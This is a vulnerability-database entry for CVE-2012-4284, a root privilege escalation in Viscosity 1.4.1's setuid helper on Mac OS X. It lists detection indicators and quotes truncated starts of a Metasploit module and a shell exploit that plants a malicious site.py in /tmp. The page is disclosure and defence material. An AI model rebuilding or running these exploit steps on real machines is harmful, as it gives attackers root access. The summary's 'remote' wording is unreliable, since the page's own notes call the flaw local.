CVE-2012-4284
published 2020-01-10CVE-2012-4284: A Privilege Escalation vulnerability exists in Viscosity 1.4.1 on Mac OS X due to a path name validation issue in the setuid-set ViscosityHelper binary, which…
PriorityP279critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
69.52%
99.3th percentile
A Privilege Escalation vulnerability exists in Viscosity 1.4.1 on Mac OS X due to a path name validation issue in the setuid-set ViscosityHelper binary, which could let a remote malicious user execute arbitrary code
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sparklabs | viscosity | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandfind /Applications/Viscosity.app/Contents/Resources/ViscosityHelper -type f -user root -perm -4000↗
- →Alert on symlink creation pointing to /Applications/Viscosity.app/Contents/Resources/ViscosityHelper from any directory other than the application bundle, especially /tmp. ↗
- →Detect ViscosityHelper executing with a working directory of /tmp or other writable paths — legitimate use should only run from within the Viscosity application bundle. ↗
- →Watch for os.setuid(0) / os.setgid(0) calls originating from a Python process spawned by ViscosityHelper (setuid root), indicating successful privilege escalation via the injected site.py. ↗
- →Flag chmod 6777 applied to a newly dropped executable in /tmp by a root-owned process — this is the Metasploit module's payload staging step after exploitation. ↗
- →Check for ViscosityHelper being invoked with a setuid bit (find -type f -user root -perm -4000) as part of attacker reconnaissance prior to exploitation. ↗
- ·The exploit only works against Viscosity version 1.4.1 on Mac OS X; patched or newer versions are not affected. ↗
- ·The Metasploit module requires an existing shell session (local access) and targets both x86 and x64 architectures; it is a local privilege escalation, not a remote exploit. ↗
- ·The writable directory defaults to /tmp; defenders should note that the exploit artifacts (symlink, site.py, site.pyc, payload EXE) are left on disk unless manually cleaned. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Viscosity - setuid-set ViscosityHelper Privilege Escalation (Metasploit)
exploitdb·2013-03-05
CVE-2012-4284 Viscosity - setuid-set ViscosityHelper Privilege Escalation (Metasploit)
Viscosity - setuid-set ViscosityHelper Privilege Escalation (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/exploit/exe'
class Metasploit4 'Viscosity setuid-set ViscosityHelper Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The
vulnerability exists in the setuid ViscosityHelper, where an insufficient
validation of path names allows execution of arbitrary python code as root.
This module has been tested successf
Exploit-DB
Viscosity - Local Privilege Escalation
exploitdb·2012-08-13
CVE-2012-4284 Viscosity - Local Privilege Escalation
Viscosity - Local Privilege Escalation
---
#!/bin/sh
#
##########################
# Viscatory #
# #
# zx2c4 #
##########################
#
# After the hullabaloo from the Tunnelblick local root, savy Mac users
# began defending Viscosity, another OS X VPN client. They figured, since
# they spent money on Viscosity, surely it would be better designed than
# the free open-source alternative.
#
# Unfortunately, this exploit took all of 2 minutes to find. DTrace for
# the win. Here, the SUID helper will execute site.py in its enclosing
# folder. A simple symlink, and we have root.
#
# greets to jono
#
# Source: http://git.zx2c4.com/Viscatory/tree/viscatory.sh
echo "[+] Crafting payload."
mkdir -p -v /tmp/pwn
cat > /tmp/pwn/site.py <<_EOF
import os
print "[+] Cleaning up."
os.system("rm -rvf
Metasploit
Viscosity setuid-set ViscosityHelper Privilege Escalation
metasploit
Viscosity setuid-set ViscosityHelper Privilege Escalation
Viscosity setuid-set ViscosityHelper Privilege Escalation
This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The vulnerability exists in the setuid ViscosityHelper, where an insufficient validation of path names allows execution of arbitrary python code as root. This module has been tested successfully on Viscosity 1.4.1 over Mac OS X 10.7.5.
No writeups or analysis indexed.
http://www.exploit-db.com/exploits/24579http://www.securityfocus.com/bid/55002https://packetstormsecurity.com/files/120643/Viscosity-setuid-set-ViscosityHelper-Privilege-Escalation.htmlhttps://www.sparklabs.com/viscosity/releasenotes/mac/http://www.exploit-db.com/exploits/24579http://www.securityfocus.com/bid/55002https://packetstormsecurity.com/files/120643/Viscosity-setuid-set-ViscosityHelper-Privilege-Escalation.htmlhttps://www.sparklabs.com/viscosity/releasenotes/mac/
2020-01-10
Published